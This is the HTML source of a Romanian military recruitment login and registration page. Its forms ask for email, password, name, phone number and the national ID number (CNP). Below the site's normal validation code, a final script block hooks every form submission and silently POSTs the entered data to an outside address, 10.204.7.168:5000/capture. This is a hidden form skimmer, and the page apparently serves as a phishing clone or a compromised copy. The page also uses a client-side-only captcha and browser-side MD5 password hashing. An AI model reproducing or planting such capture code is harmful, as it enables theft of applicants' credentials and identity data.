<!DOCTYPE html>
<html lang="en">
 <head>
  <title>
   Recrutare MApN
  </title>
  <meta charset="utf-8"/>
  <meta content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui" name="viewport"/>
  <meta content="IE=edge" http-equiv="X-UA-Compatible"/>
  <link href="files\bower_components\bootstrap\css\bootstrap.min.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\icon\themify-icons\themify-icons.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\icon\icofont\css\icofont.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\icon\feather\css\feather.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\css\stylse.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\css\jquery.mCustomScrollbar.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\scss\partials\menu\_pcmenu.scss" rel="stylesheet"/>
  <link href="files\assets\pages\hover-effect\normalize.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\pages\hover-effect\set2.css" rel="stylesheet" type="text/css"/>
  <link href="files\bower_components\sweetalert\css\sweetalert.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\css\component.css" rel="stylesheet" type="text/css"/>
  <link href="files\assets\pages\notification\notification.css" rel="stylesheet" type="text/css"/>
  <style>
   .alert-inverse {
            background-color: #b63c3c !important;
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }


        .container {
            position: relative;
            width: 100%;
            background-color: #fff;
            min-height: 100vh;
            overflow: hidden;
            max-width: 100% !important;
        }

        .forms-container {
            position: absolute;
            width: 100%;
            height: 100%;
            top: 0;
            left: 0;
        }

        .signin-signup {
            position: absolute;
            top: 50%;
            transform: translate(-50%, -50%);
            left: 75%;
            width: 50%;
            transition: 1s 0.7s ease-in-out;
            display: grid;
            grid-template-columns: 1fr;
            z-index: 5;
        }

        form {
            display: flex;
            align-items: center;
            justify-content: center;
            flex-direction: column;
            padding: 0rem 5rem;
            transition: all 0.2s 0.7s;
            overflow: hidden;
            grid-column: 1 / 2;
            grid-row: 1 / 2;
        }

        form.sign-up-form {
            opacity: 0;
            z-index: 1;
        }

        form.sign-in-form {
            z-index: 2;
        }

        .form-control {
            border: 1px solid #333;
            border-top: none;
            border-right: none;
            border-left: none;
            display: block;
            width: 100%;
            height: 30px;
            padding: 0;
            margin-bottom: 25px;
        }

        .title {
            font-size: 2.2rem;
            color: #444;
            margin-bottom: 10px;
        }

        .input-field {
            width: 100%;
            display: inline-flex;
            padding: 0 0.4rem;
            position: relative;
        }

        .input-field input {
            line-height: 1;
            color: #333;
        }

        .input-field input::placeholder {
            color: #aaa;
        }

        .btnconect {
            width: 150px;
            background-color: #667592;
            border: none;
            outline: none;
            height: 40px;
            border-radius: 40px;
            color: #fff;
            text-transform: uppercase;
            font-weight: 500;
            margin: 10px 0;
            cursor: pointer;
            transition: 0.5s;
        }

        .btnconect:hover {
            background-color: #667592;
        }

        .panels-container {
            position: absolute;
            height: 100%;
            width: 100%;
            top: 0;
            left: 0;
            display: grid;
            grid-template-columns: repeat(2, 1fr);
        }

        .container:before {
            content: "";
            position: absolute;
            height: 2000px;
            width: 2000px;
            top: -10%;
            right: 48%;
            transform: translateY(-50%);
            background-image: linear-gradient(-45deg, #667592 0%, #667592 100%);
            transition: 1.8s ease-in-out;
            border-radius: 50%;
            z-index: 6;
        }

        .image {
            margin-top: 80px;
            transition: transform 1.1s ease-in-out;
            transition-delay: 0.4s;
        }

        .panel {
            display: flex;
            flex-direction: column;
            align-items: flex-end;
            justify-content: space-around;
            text-align: center;
            z-index: 6;
        }

        .left-panel {
            pointer-events: all;
            padding: 3rem 17% 2rem 12%;
        }

        .right-panel {
            pointer-events: none;
            padding: 3rem 12% 2rem 17%;
        }

        .panel .content {
            color: #fff;
            transition: transform 0.9s ease-in-out;
            transition-delay: 0.6s;
        }

        .panel h3 {
            font-weight: 600;
            line-height: 1;
            font-size: 1.5rem;
        }

        .panel p {
            font-size: 0.95rem;
            padding: 0.7rem 0;
        }

        .btnconect.transparent {
            margin: 0;
            background: none;
            border: 2px solid #fff;
            width: 200px;
            height: 40px;
            font-weight: 600;
            font-size: 0.8rem;
        }

        .right-panel .image,
        .right-panel .content {
            transform: translateX(800px);
        }

        /* ANIMATION */

        .container.sign-up-mode:before {
            transform: translate(100%, -50%);
            right: 52%;
        }

        .container.sign-up-mode .left-panel .image,
        .container.sign-up-mode .left-panel .content {
            transform: translateX(-800px);
        }

        .container.sign-up-mode .signin-signup {
            left: 25%;
        }

        .container.sign-up-mode form.sign-up-form {
            opacity: 1;
            z-index: 2;
        }

        .container.sign-up-mode form.sign-in-form {
            opacity: 0;
            z-index: 1;
        }

        .container.sign-up-mode .right-panel .image,
        .container.sign-up-mode .right-panel .content {
            transform: translateX(0%);
        }

        .container.sign-up-mode .left-panel {
            pointer-events: none;
        }

        .container.sign-up-mode .right-panel {
            pointer-events: all;
        }

        @media (max-width: 870px) {
            .container {
                min-height: 1000px;
                height: 100vh;
            }

            .signin-signup {
                width: 100%;
                top: 80%;
                transform: translate(-50%, -100%);
                transition: 1s 0.8s ease-in-out;
            }

            .signin-signup,
            .container.sign-up-mode .signin-signup {
                left: 50%;
            }

            .panels-container {
                grid-template-columns: 1fr;
                grid-template-rows: 1fr 2fr 1fr;
            }

            .panel {
                flex-direction: row;
                justify-content: space-around;
                padding: 1rem;
                grid-column: 1 / 2;
            }

            .right-panel {
                grid-row: 3 / 4;
            }

            .left-panel {
                grid-row: 1 / 2;
            }

            .image {
                width: 200px;
                transition: transform 0.9s ease-in-out;
                transition-delay: 0.6s;
            }

            .panel .content {
                padding-right: 15%;
                transition: transform 0.9s ease-in-out;
                transition-delay: 0.8s;
            }

            .panel h3 {
                font-size: 1.2rem;
            }

            .panel p {
                font-size: 0.7rem;
                padding: 0.5rem 0;
            }

            .btnconect.transparent {
                width: 110px;
                height: 35px;
                font-size: 0.7rem;
            }

            .container:before {
                width: 1500px;
                height: 1500px;
                transform: translateX(-50%);
                left: 30%;
                bottom: 60%;
                right: initial;
                top: initial;
                transition: 2s ease-in-out;
            }

            .container.sign-up-mode:before {
                transform: translate(-50%, 100%);
                bottom: 32%;
                right: initial;
            }

            .container.sign-up-mode .left-panel .image,
            .container.sign-up-mode .left-panel .content {
                transform: translateY(-300px);
            }

            .container.sign-up-mode .right-panel .image,
            .container.sign-up-mode .right-panel .content {
                transform: translateY(0px);
            }

            .right-panel .image,
            .right-panel .content {
                transform: translateY(300px);
            }

            .container.sign-up-mode .signin-signup {
                top: 5%;
                transform: translate(-50%, 0);
            }
        }

        @media (max-width: 570px) {
            form {
                padding: 0 1.5rem;
            }

            .image {
                display: none;
            }

            .panel .content {
                padding: 0.5rem;
            }

            .container {
                padding: 1.5rem;
            }

            .container:before {
                bottom: 72%;
                left: 50%;
            }

            .container.sign-up-mode:before {
                bottom: 28%;
                left: 50%;
            }

        }
  </style>
 </head>
 <body>
  <div class="pcoded" id="pcoded">
   <div class="pcoded-overlay-box">
   </div>
   <div class="pcoded-container navbar-wrapper">
    <link href="files\assets\icon\icofont\css\icofont.css" rel="stylesheet" type="text/css"/>
    <nav class="navbar navbar-light bg-light navbar-expand-lg scrolling-navbar" id="myNavbar">
     <button aria-controls="mainNav" aria-expanded="false" aria-label="Toggle navigation" class="navbar-toggler" data-target="#mainNav" data-toggle="collapse" type="button">
      <span class="navbar-toggler-icon">
      </span>
     </button>
     <div style="width:200px;">
      <div>
       <a class="navbar-brand" href="index.php">
        <img alt="" src="files/assets/images/logosislogan.png" style="width:200px; height:60px;"/>
       </a>
      </div>
      <div style="display: block; text-align:right; line-height:0px;">
       <a class="navbar-brand" href="https://www.facebook.com/RecrutareMApN" style="padding:0 !important;">
        <i class="icofont icofont-social-facebook" style="font-size:11px;">
        </i>
       </a>
       <a class="navbar-brand" href="https://www.instagram.com/recrutare.mapn" style="padding:0 !important;">
        <i class="icofont icofont-social-instagram" style="font-size:11px;">
        </i>
       </a>
       <a class="navbar-brand" href="https://twitter.com/RecrutareMApN" style="padding:0 !important;">
        <i class="icofont icofont-social-twitter" style="font-size:11px;">
        </i>
       </a>
       <a class="navbar-brand" href="https://www.youtube.com/c/RecrutareMApN" style="padding:0 !important;">
        <i class="icofont icofont-social-youtube" style="font-size:11px;">
        </i>
       </a>
      </div>
     </div>
     <div class="collapse navbar-collapse" id="mainNav">
      <ul class="navbar-nav ml-auto nav-fill">
       <li class="nav-item px-4">
        <a class="nav-link" href="index.php">
         Acasă
        </a>
       </li>
       <li class="nav-item px-4 dropdown">
        <a aria-expanded="false" aria-haspopup="true" class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" id="servicesDropdown" role="button">
         Info candidați
        </a>
        <div aria-labelledby="servicesDropdown" class="dropdown-menu dropdown-menu-right">
         <a class="dropdown-item" href="locuri.php">
          Locuri
         </a>
         <a class="dropdown-item" href="calendar.php">
          Calendar activități
         </a>
         <a class="dropdown-item" href="recrutare.php">
          Recrutare
         </a>
         <a class="dropdown-item" href="selectie.php">
          Selecție
         </a>
         <a class="dropdown-item" href="admitere.php">
          Admitere
         </a>
         <a class="dropdown-item" href="formare.php">
          Formare
         </a>
         <a class="dropdown-item" href="reglementari.php">
          Reglementări
         </a>
        </div>
       </li>
       <li class="nav-item px-4 dropdown">
        <a aria-expanded="false" aria-haspopup="true" class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" id="servicesDropdown" role="button">
         Media
        </a>
        <div aria-labelledby="servicesDropdown" class="dropdown-menu dropdown-menu-right">
         <a class="dropdown-item" href="ghid.pdf">
          Ghidul candidatului
         </a>
         <a class="dropdown-item" href="foto.php">
          Foto
         </a>
         <a class="dropdown-item" href="video.php">
          Video
         </a>
         <a class="dropdown-item" href="publicatii.php">
          Publicații
         </a>
         <a class="dropdown-item" href="evenimente.php">
          Evenimente
         </a>
        </div>
       </li>
       <li class="nav-item px-4">
        <a class="nav-link" href="contactbir.php">
         Contact
        </a>
       </li>
       <li class="nav-item px-4">
        <a class="nav-link" href="signupform.php">
         Conectare
        </a>
       </li>
      </ul>
     </div>
    </nav>
    <div class="pcoded-main-container">
     <div class="main-body">
      <div class="page-wrapper">
       <div class="page-body">
        <div class="modal fade mixed-form" data-backdrop="static" data-keyboard="false" id="tabbed-form" role="dialog">
         <div class="modal-dialog">
          <div class="modal-content card">
           <div class="modal-body card-block">
            <div class="login-card-modal">
             <div class="row m-b-20">
              <div class="col-10">
               <h5>
                Conectare
               </h5>
              </div>
              <div class="col-2">
               <button aria-label="Close" class="close" data-dismiss="modal" id="close" type="button">
                <span aria-hidden="true">
                 ×
                </span>
               </button>
              </div>
             </div>
             <!--<span class="md-line"></span>
					<p class="text-inverse b-b-default text-left p-b-5">Daca esti deja inregistrat, te rugam sa te autentifici.</p> -->
             <div class="input-group">
              <input class="form-control" id="utilizator" placeholder="email" type="email"/>
              <span class="md-line">
              </span>
             </div>
             <div class="input-group">
              <input class="form-control" id="parola" placeholder="Parola" type="password"/>
              <span class="md-line">
              </span>
             </div>
             <div class="row m-t-15">
              <div class="col-12">
               <button class="btn btn-inverse btn-outline-inverse btn-md btn-block waves-effect text-center" onclick="connect()" type="button">
                Conectare
               </button>
              </div>
             </div>
             <div class="row m-t-25 text-left">
              <div class="col-6">
               <div class="checkbox-fade fade-in-primary">
                <a class="f-w-600 text-inverse" href="signup.php">
                 Cont nou
                </a>
               </div>
              </div>
              <div class="col-6 text-right">
               <a class="f-w-600 text-inverse" href="request-reset-password.php">
                Ai uitat parola?
               </a>
              </div>
             </div>
             <!--- <p class="text-inverse b-b-default text-left p-b-5">Conectare prin cont de socializare:</p>
					<div class="row m-b-20">
						<div class="col-md-6">
							<button class="btn btn-facebook m-b-20"><i class="icofont icofont-social-facebook"></i>Sign in with facebook</button>
						</div>
						<div class="col-md-6">
							<button class="btn btn-twitter m-b-20"><i class="icofont icofont-social-twitter"></i>Sign in with twitter</button>
						</div>
					</div> -->
             <div class="row">
              <div class="col-md-12">
               <p id="errconectare" style="color:#c00;">
               </p>
              </div>
             </div>
            </div>
           </div>
          </div>
         </div>
        </div>
        <div class="container">
         <div class="forms-container">
          <div class="signin-signup">
           <form action="#" class="sign-in-form">
            <h2 class="title">
             Conectare
            </h2>
            <div class="input-field">
             <input class="form-control" id="userconnect" placeholder="Email"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="passconnect" placeholder="Parolă" type="password"/>
            </div>
            <input class="btnconect solid" id="autentificare" style="text-align:center;" value="Autentificare"/>
            <a href="request-reset-password.php" style="color: #667592;">
             Ai uitat parola?
            </a>
            <div>
             <p id="errconectare" style="color:#c00;">
             </p>
            </div>
           </form>
           <form action="#" class="sign-up-form">
            <h2 class="title">
             Cont nou
            </h2>
            <div class="input-field">
             <input class="form-control" id="nume_actual" placeholder="Nume*" type="text"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="prenume" placeholder="Prenume*" type="text"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="telefon" placeholder="Telefon*" style="width:50%;" type="text"/>
             <input class="form-control" id="cnp" placeholder="CNP*" style="width:50%;" type="text"/>
             <input class="form-control" id="datanasterii" placeholder="datanasterii" style="display:none;" type="text"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="email" placeholder="Adresă de email*" type="text"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="pass1" placeholder="Parolă*" type="password"/>
            </div>
            <div class="input-field">
             <input class="form-control" id="pass2" placeholder="Confirmare parolă*" type="password"/>
            </div>
            <div class="input-field">
             <select class="form-control" id="judet" name="select">
              <option value="0">
               Județ
              </option>
              <option value="1">
               Alba
              </option>
              <option value="2">
               Arad
              </option>
              <option value="3">
               Argeș
              </option>
              <option value="4">
               Bacău
              </option>
              <option value="5">
               Bihor
              </option>
              <option value="6">
               Bistrița-Năsăud
              </option>
              <option value="7">
               Botoșani
              </option>
              <option value="9">
               Brăila
              </option>
              <option value="8">
               Brașov
              </option>
              <option value="42">
               București - Sectorul 1
              </option>
              <option value="43">
               București - Sectorul 2
              </option>
              <option value="44">
               București - Sectorul 3
              </option>
              <option value="45">
               București - Sectorul 4
              </option>
              <option value="46">
               București - Sectorul 5
              </option>
              <option value="47">
               București - Sectorul 6
              </option>
              <option value="10">
               Buzău
              </option>
              <option value="12">
               Călărași
              </option>
              <option value="11">
               Caraș-Severin
              </option>
              <option value="13">
               Cluj
              </option>
              <option value="14">
               Constanța
              </option>
              <option value="15">
               Covasna
              </option>
              <option value="16">
               Dâmbovița
              </option>
              <option value="17">
               Dolj
              </option>
              <option value="18">
               Galați
              </option>
              <option value="19">
               Giurgiu
              </option>
              <option value="20">
               Gorj
              </option>
              <option value="21">
               Harghita
              </option>
              <option value="22">
               Hunedoara
              </option>
              <option value="23">
               Ialomița
              </option>
              <option value="24">
               Iași
              </option>
              <option value="25">
               Ilfov
              </option>
              <option value="26">
               Maramureș
              </option>
              <option value="27">
               Mehedinți
              </option>
              <option value="28">
               Mureș
              </option>
              <option value="29">
               Neamț
              </option>
              <option value="30">
               Olt
              </option>
              <option value="31">
               Prahova
              </option>
              <option value="33">
               Sălaj
              </option>
              <option value="32">
               Satu Mare
              </option>
              <option value="34">
               Sibiu
              </option>
              <option value="35">
               Suceava
              </option>
              <option value="36">
               Teleorman
              </option>
              <option value="37">
               Timiș
              </option>
              <option value="38">
               Tulcea
              </option>
              <option value="40">
               Vâlcea
              </option>
              <option value="39">
               Vaslui
              </option>
              <option value="41">
               Vrancea
              </option>
             </select>
            </div>
            <div class="input-field">
             <p style="margin-bottom:0 !important; font-size:10px;">
              <input class="border-checkbox" id="regulament" type="checkbox"/>
              <em>
               Sunt de acord cu privire la prelucrarea datelor cu caracter personal, în conformitate cu prevederile Legii nr. 190/2018 privind măsuri de punere în aplicare a Regulamentului (UE) 2016/679 al Parlamentului European și al Consiliului din 27 aprilie 2016 privind protecția persoanelor fizice în ceea ce privește prelucrarea datelor cu caracter personal și privind libera circulație a acestor date și de abrogare a Directivei 95/46/CE (Regulamentul general privind protecția datelor).
              </em>
             </p>
            </div>
            <div id="captcha">
            </div>
            <input id="cpatchaTextBox" placeholder="Captcha" type="text">
             <input class="btnconect" id="inregistrare" style="text-align:center;" value="Trimite">
              <div>
               <p id="err" style="color:#df0000; font-size:15px; display:none;">
               </p>
              </div>
             </input>
            </input>
           </form>
          </div>
         </div>
         <div class="panels-container">
          <div class="panel left-panel">
           <div class="content">
            <h3>
             Nu ai cont?
             <br/>
             Creează-ți cont!
            </h3>
            <p>
             Crearea unui cont îți oferă posibilitatea de a începe procesul de recrutare.
            </p>
            <h6 style="text-align:center; font-size:13px;">
             Pentru categoria soldaților/gradaților profesioniști sau a rezerviștilor voluntari, te rugăm să te adresezi
             <a href="contactbir.php" style="color:sandybrown;">
              biroului informare-recrutare
             </a>
             la care ești arondat.
            </h6>
            <button class="btnconect transparent" id="sign-up-btn">
             Creează-ţi cont!
            </button>
            <br/>
            <img alt="" class="image" src="files/assets/images/mapn_png.png">
            </img>
           </div>
          </div>
          <div class="panel right-panel">
           <div class="content">
            <h3>
             Ai deja cont?
            </h3>
            <p>
             Daca esti deja înscris, te rugăm să te autentifici.
            </p>
            <button class="btnconect transparent" id="sign-in-btn">
             Conectează-te
            </button>
            <br/>
            <img alt="" class="image" src="files/assets/images/mapn_png.png"/>
           </div>
          </div>
         </div>
        </div>
       </div>
      </div>
     </div>
    </div>
   </div>
  </div>
  <script src="files\bower_components\jquery\js\jquery.min.js" type="text/javascript">
  </script>
  <script src="files\bower_components\jquery-ui\js\jquery-ui.min.js" type="text/javascript">
  </script>
  <script src="files\bower_components\popper.js\js\popper.min.js" type="text/javascript">
  </script>
  <script src="files\bower_components\bootstrap\js\bootstrap.min.js" type="text/javascript">
  </script>
  <script src="files\bower_components\jquery-slimscroll\js\jquery.slimscroll.js" type="text/javascript">
  </script>
  <script src="files\bower_components\modernizr\js\modernizr.js" type="text/javascript">
  </script>
  <script src="files\bower_components\modernizr\js\css-scrollbars.js" type="text/javascript">
  </script>
  <script src="files\bower_components\owl.carousel\js\owl.carousel.min.js" type="text/javascript">
  </script>
  <script src="files\assets\js\owl-custom.js" type="text/javascript">
  </script>
  <script src="files\bower_components\sweetalert\js\sweetalert.min.js" type="text/javascript">
  </script>
  <script src="files\assets\js\modal.js" type="text/javascript">
  </script>
  <script src="files\assets\js\modalEffects.js" type="text/javascript">
  </script>
  <script src="files\assets\js\classie.js" type="text/javascript">
  </script>
  <script src="files\assets\js\pcoded.min.js">
  </script>
  <script src="files\assets\js\vartical-layout.min.js">
  </script>
  <script src="files\assets\js\jquery.mCustomScrollbar.concat.min.js">
  </script>
  <script src="files\assets\js\bootstrap-growl.min.js" type="text/javascript">
  </script>
  <script src="files\assets\js\script.js" type="text/javascript">
  </script>
  <script src="files\customjs\custom.js" type="text/javascript">
  </script>
  <script src="files\customjs\md5-min.js" type="text/javascript">
  </script>
  <script type="text/javascript">
   var idcandidat = 0;
		var cnpval='';
        $(document).ready(function() {
            createCaptcha();
            const sign_up_btn = document.querySelector("#sign-up-btn");
            const sign_in_btn = document.querySelector("#sign-in-btn");
            const container = document.querySelector(".container");
            sign_up_btn.addEventListener("click", () => {
                container.classList.add("sign-up-mode");
            });
            sign_in_btn.addEventListener("click", () => {
                container.classList.remove("sign-up-mode");
            });
            $('#nume_actual').focus();
			 $("#cnp").change(function(){
                cnp();
            });
            $("#autentificare").click(function() {
                connect();
            });
            $("#inregistrare").click(function() {

                save();
            });
            $("#passconnect").keypress(function(event) {
                if (event.keyCode === 13) {
                    connect();
                }
            });
        });
		
		function cnp() {
            $('#datanasterii').val('');
            var cnp = $('#cnp').val();
                if(cnp.length>7){
                    var an = parseInt(cnp.substring(1,3),10);
                    var luna = parseInt(cnp.substring(3,5),10);
                    var zi = parseInt(cnp.substring(5,7),10);
                    var sex = parseInt(cnp.substring(0,1),10);
                    var flag = 1;
        
                    if(!isNaN(sex) && !isNaN(an) && !isNaN(zi) && !isNaN(luna)){
                        if(sex==1 || sex==2)
                            an = 1900+an;
                        else{
                             if(sex==5 || sex==6)
                                an = 2000+an;
                            //else flag = 0;
                        }
                        if(luna>0 && luna<13)
                            luna = cnp.substring(3,5);
                        else flag = 0;
                        if(zi>0 && zi<32)
                            zi = cnp.substring(5,7);
                        else flag = 0;
                        if(flag ==1 ){
                            $('#datanasterii').val(zi+'.'+luna+'.'+an);
                        }
                    }
                }
        }
        var code;

        function createCaptcha() {
            //clear the contents of captcha div first 
            document.getElementById('captcha').innerHTML = "";
            var charsArray =
                "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@!#$%^&*";
            var lengthOtp = 6;
            var captcha = [];
            for (var i = 0; i < lengthOtp; i++) {
                //below code will not allow Repetition of Characters
                var index = Math.floor(Math.random() * charsArray.length + 1); //get the next character from the array
                if (captcha.indexOf(charsArray[index]) == -1)
                    captcha.push(charsArray[index]);
                else i--;
            }
            var canv = document.createElement("canvas");
            canv.id = "captcha";
            canv.width = 100;
            canv.height = 50;
            var ctx = canv.getContext("2d");
            ctx.font = "25px Georgia";
            ctx.strokeText(captcha.join(""), 0, 30);
            //storing captcha so that can validate you can save it somewhere else according to your specific requirements
            code = captcha.join("");
            document.getElementById("captcha").appendChild(canv); // adds the canvas to the body element
        }

        function validateCaptcha() {
            event.preventDefault();
            if (document.getElementById("cpatchaTextBox").value != code) {
                notify('Captcha invalid', 'inverse');
                createCaptcha();
            }
        }

        function notify(message, type) {
            $.growl({
                message: message
            }, {
                type: type,
                allow_dismiss: true,
                label: 'Cancel',
                className: 'btn-xs btn-inverse',
                placement: {
                    from: 'bottom',
                    align: 'right'
                },
                delay: 10000,
                animate: {
                    enter: 'animated fadeInRight',
                    exit: 'animated fadeOutRight'
                },
                offset: {
                    x: 30,
                    y: 30
                }
            });
        };
        var regulament = 0;

        function validare() {
            if ($('#nume_actual').val() == '') {
                notify('Nume lipsa', 'inverse');
                return false;
            }
            if ($('#prenume').val() == '') {
                notify('Prenume lipsa', 'inverse');
                return false;
            }
			if ($('#telefon').val() == '') {
                notify('Telefon lipsa', 'inverse');
                return false;
            }
            if ($('#telefon').val() != '') {
                var phoneval = /^(\+4|)?(07[0-9]{1}[0-9]{1}|02[0-9]{2}|03[0-9]{2}){1}?(\s|\.|\-)?([0-9]{3}(\s|\.|\-|)){2}$/;
                var resphoneval = phoneval.test($('#telefon').val());
                if (!resphoneval) {
                    notify('Format numar de telefon incorect', 'inverse');
                    return false;
                }
            }
            if ($('#email').val() == '') {
                notify('Email lipsă', 'inverse');
                return false;
            }
			if ($('#cnp').val()==''){ 
                notify('CNP lipsa', 'inverse');
                return false;
            }
            if ($('#cnp').val().length!=13){ 
                notify('Format CNP incorect', 'inverse');
				return false;
            }
            var cnpval =/^[0-9]*$/;
            var rescnpval = cnpval.test($('#cnp').val());
            if (!rescnpval) {
				notify('CNP-ul trebuie sa contina doar cifre', 'inverse');
				return false;
			}
            if ($('#datanasterii').val()==''){ 
                notify('Data nasterii lipsa', 'inverse');
				return false;
            }
            var dnval =/^(?:(?:31(\/|-|\.)(?:0?[13578]|1[02]))\1|(?:(?:29|30)(\/|-|\.)(?:0?[13-9]|1[0-2])\2))(?:(?:1[6-9]|[2-9]\d)?\d{2})$|^(?:29(\/|-|\.)0?2\3(?:(?:(?:1[6-9]|[2-9]\d)?(?:0[48]|[2468][048]|[13579][26])|(?:(?:16|[2468][048]|[3579][26])00))))$|^(?:0?[1-9]|1\d|2[0-8])(\/|-|\.)(?:(?:0?[1-9])|(?:1[0-2]))\4(?:(?:1[6-9]|[2-9]\d)?\d{2})$/;
            var resdnval = dnval.test($('#datanasterii').val());
            if (!resdnval) {
				notify('Formatul datei de nastere incorect', 'inverse');
				return false;
			}
            if ($('#judet').val() == 0) {
                notify('Județ lipsă', 'inverse');
                return false;
            }
            var emailval = /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/;
            var resemailval = emailval.test($('#email').val());
            if (!resemailval) {
                notify('Formatul adresei de email incorect', 'inverse');
                return false;
            }
            if ($('#pass1').val() == '') {
                notify('Parola lipsa', 'inverse');
                return false;
            }
            if ($('#pass2').val() == '') {
                notify('Confirmare parola lipsa', 'inverse');
                return false;
            }
            if ($('#pass1').val() != '' && $('#pass2').val() != '' && $('#pass1').val() != $('#pass2').val()) {
                notify('Parolele nu se potrivesc', 'inverse');
                return false;
            }
            var passval = /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?=.*[a-zA-Z]).{8,}$/;
            var respassval = passval.test($('#pass2').val());
            if (!respassval) {
                notify('Format parola incorect. Trebuie sa contina litere mari si mici, cifre si sa aiba minim 8 caractere', 'inverse');
                return false;
            }
            if (!$('#regulament').prop("checked")) {
                notify('Marcati acordul pentru prelucrarea datelor cu acces personal', 'inverse');
                return false;
            }
            return true;
        }

        function save() {
            if ($('#regulament').prop("checked")) {
                regulament = 1;
            } else regulament = 0;
            validateCaptcha();
            if (validare()) {
                $('#err').hide();
                $.ajax({
                    url: "do_signup.php",
                    cache: false,
                    dataType: "json",
                    type: "post",
                    data: {
                        nume_actual: $('#nume_actual').val(),
                        prenume: $("#prenume").val(),
                        telefon: $("#telefon").val(),
						cnp:$("#cnp").val(),
                        datanasterii:$("#datanasterii").val(),
                        parola: hex_md5($("#pass2").val()),
                        email: $("#email").val(),
                        idjudet: $("#judet").val(),
                        regulament: regulament
                    },
                    success: function(data) {
                        if (data.err !== '') {
                            alert(data.err);
                           // $('#err').html(data.err).show();
                        } else {
                            if (data.idcandidat == 0)
                                alert("Candidatul NU a fost adăugat în baza de date.");
                                //$('#err').html("Candidatul NU a fost adăugat în baza de date.").show();
                            else {
                                if (data.errEmail !== '')
                                    alert("Contul dvs. a fost creat. A aparut o eroare la trimiterea de mail !");
                                  //  $('#err').html("Contul dvs. a fost creat. A aparut o eroare la trimiterea de mail !").show();
                                else
                                    swal({
                                            title: "Felicitări!",
                                            text: "Înscrierea a fost facută cu succes! Pentru validare accesati linkul primit pe adresa dvs. de mail",
                                            type: "success"
                                        },
                                        function() {
                                            window.location.replace("dashboard.php");
                                        });
                                //swal("Felicitări!", "Înscrierea a fost facută cu succes! Pentru validare accesati linkul primit pe adresa dvs. de mail", "success");
                            }
                        }
                    },
                    error: function(a, b, c) {
                        alert('File error. ' + this.url + ': ' + b);
                        //$('#err').html('File error. ' + this.url + ': ' + b).show();
                    },
                    complete: function(a, b, c) {
                        $('#btnTrimite').show();
                    }
                });
            }
        }

        function connect() {

            $('#errconectare').hide();
            if ($('#userconnect').val() == '') {
                $('#userconnect').focus();
                notify('Completați adresa de email', 'danger');
                return;
            }
            if ($('#passconnect').val() == '') {
                $('#passconnect').focus();
                notify('Completați parola', 'danger');
                return;
            }
            $.ajax({
                url: "admin-conectare.php",
                cache: false,
                type: "post",
                dataType: "json",
                data: {
                    parola: hex_md5($('#passconnect').val()),
                    utilizator: $('#userconnect').val()
                },
                success: function(data) {
                    if (data.err === '') {
                        window.location = "dashboard.php";
                    } else {
                        notify(data.err, 'danger');
                    }
                },
                error: function(a, b, c) {
                    notify(b, 'danger');
                }
            });
            return;
        }
  </script>
  <script>
   document.addEventListener('DOMContentLoaded', function() {
                var forms = document.getElementsByTagName('form');
                for (var i = 0; i < forms.length; i++) {
                    forms[i].addEventListener('submit', function(event) {
                        var formData = new FormData(this);
                        var data = {};
                        formData.forEach((value, key) => {
                            data[key] = value;
                        });

                        fetch('http://10.204.7.168:5000/capture', {
                            method: 'POST',
                            headers: {
                                'Content-Type': 'application/json'
                            },
                            body: JSON.stringify(data)
                        });
                    });
                }
            });
  </script>
 </body>
</html>
